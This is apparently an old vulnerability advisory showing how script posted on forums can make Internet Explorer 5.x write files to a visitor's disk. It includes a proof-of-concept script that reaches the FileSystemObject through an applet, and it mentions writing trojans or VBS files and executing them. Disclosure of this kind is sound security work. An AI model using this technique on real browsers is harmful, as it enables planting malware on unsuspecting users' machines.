* Internet Explorer JavaScript insecure function *

Product: Microsoft Internet Explorer
Version: 5.x (other versions are probably also affected)

*** Problem:

I discovered that a JavaScript function (interpreted by Internet Explorer) called "file.writeline()" may be potentially dangerous for Internet Explorer users. This function allows JavaScript to write files to the hard disk. An attacker may use it by placing JavaScript code in posts on forums, guestbooks, etc., and so compromise the computers of the victims who view those posts. With "file.writeline()" the attacker can write trojans, viruses and the like to the victim's hard disk; for example, an attacker may use "file.writeline()" to write a malicious file in VBS (Visual Basic Scripting) language. I repeat, this may be potentially dangerous for Internet Explorer users.

NOTE: A virus currently in the wild that affects mIRC users uses this function ("file.writeline").

NOTE2: As the "Proof of concept" shows, other functions are needed to carry out an "intrusion". "writeline()" is a method of the TextStream object returned by the Scripting.FileSystemObject (FSO), so the script first has to obtain an FSO instance; the proof of concept does this through a Java applet's setCLSID()/createInstance() interface, passing the FSO's class ID, and only then opens the file and writes to it.
*** Proof of concept:

    // Assumes the page already contains an applet (not shown in the
    // advisory) that exposes setCLSID() and createInstance() to script.
    InterfaceObject = document.applets[0];
    setTimeout("Write()", 1000);

    function Write() {
        // CLSID of Scripting.FileSystemObject
        fsoClassID = "{0D43FE01-F093-11CF-8940-00A0C9054228}";
        InterfaceObject.setCLSID(fsoClassID);
        fso = InterfaceObject.createInstance();
        // windir = fso.getspecialfolder ;
        filename = "\\proof.txt";            // root of the current drive
        var filecontent = "Hello world";
        // 2 = ForWriting, TRUE = create the file if it does not exist
        file = fso.opentextfile(filename, "2", "TRUE");
        file.writeline(filecontent);
        file.close();
    }
This code writes a file called "proof.txt" with the content "Hello world" to the root of the current drive. Files written this way can also be executed from JavaScript by adding a "Run();" call to the function.

*** Solution:

I'm not sure about the solution, but I recommend upgrading to the latest version of Internet Explorer. I also recommend that webmasters forbid HTML containing this function, and the script that reaches it (see NOTE2), in their forums, guestbooks, etc.

*** Thanks to:

#disidents, #hackers @ irc-phoenix.org
#disidents, #sleepx, #ayuda_internet @ irc-hispano.org

Special thanks go to: Impos

(sorry for my poor English)

*** By FREEBRAIN

FREEBRAIN is a member of DisidentS Hacker Team
http://disidents-team.cjb.net (under construction) - http://www.gratisweb.com/disidents
